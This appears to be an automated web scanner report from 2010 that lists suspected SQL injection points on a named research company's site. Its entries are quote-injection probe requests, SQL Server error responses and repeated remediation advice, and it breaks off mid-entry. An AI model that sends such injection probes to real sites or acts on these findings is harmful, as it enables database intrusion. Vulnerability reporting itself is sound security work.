GET /myaccount'/register.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=AKMKIDJBABFALIMCHCJOHMOP; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /myaccount''/register.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=HKMKIDJBKGANDLDNAPNDMHGM; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/101209.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=CDNKIDJBBJOELBDMNDNDMLKN; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/101209.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=DDNKIDJBMPHLDOFFCPGPGNHP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/101209.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=KDNKIDJBAOBEGIEMGJCNDCAO; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/101209.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=LDNKIDJBAMNNOHHEKPPEBKOJ; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/111810.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=GENKIDJBHLGKOIPBOKFMPMHH; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/111810.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=HENKIDJBMEPJLEKNAKJMOMBM; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/111810.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=KENKIDJBDHKBNDLAFCLEHLJE; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/111810.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=LENKIDJBHPHPIDCANLHNFDBK; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/120110.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FDNKIDJBOFFMKBFMOLEIKFFG; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/120110.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=GDNKIDJBOMPAGPAMGMMKIKFI; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/120110.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=ODNKIDJBGCBNNDMELKIAAOEI; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/120110.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=PDNKIDJBCIGCGIOHNKFHOLNH; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRGUATEMALA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FLMKIDJBIHICDKCBAPGOGKMA; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRGUATEMALA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=ILMKIDJBBDPMKJBNMFKEIFNN; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRISRAEL.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=LIMKIDJBHNOPJJDIHOOKMNAJ; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRISRAEL.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=NIMKIDJBGEBBAJNGJPDAFBMN; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRPANAMA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=NGMKIDJBBLHENDIHCMKHAHFK; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRPANAMA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=AHMKIDJBGEHIELFNLMPGAHBO; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRSAUDIARABIA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=IHMKIDJBDCEOIFKONOMDAGNL; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRSAUDIARABIA.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=JHMKIDJBGDCAPKKPONJJFDKN; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRVIETNAM.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:04:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=PJMKIDJBNLMCIFEOMCEKJAJC; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRVIETNAM.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:04:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FKMKIDJBOJDOOFAHNFCPMPPM; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/PREPMNGDSERV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=DFLKIDJBFHBBOCNPNLDKPNCA; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/PREPMNGDSERV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FFLKIDJBCMHDONGCPGCBJPDH; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=FGLKIDJBDHIJAKFCEAJAPHNH; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=GGLKIDJBFFGLGEIDHAGGJNLE; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPINTERNETTV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=EPKKIDJBLIDPJEBNNIBLDPMC; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPINTERNETTV.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=GPKKIDJBGKOPFDLFDFDJDOEK; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBAPPSTORE.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=NBLKIDJBNHGBOBFNGGJMBDFB; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBAPPSTORE.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=ACLKIDJBELIPBAFOLDDBDKOM; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBPAYMENT.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 12 Dec 2010 00:03:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 358 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=JCLKIDJBFFCGCCJPDPBNEOCP; path=/ Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBPAYMENT.htm HTTP/1.1 Host: www.pyramidresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Object moved Connection: close Date: Sun, 12 Dec 2010 00:03:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /index.htm Content-Length: 131 Content-Type: text/html Set-Cookie: ASPSESSIONIDQCSQBACR=MCLKIDJBLMAIJFLLPOIEFFHL; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
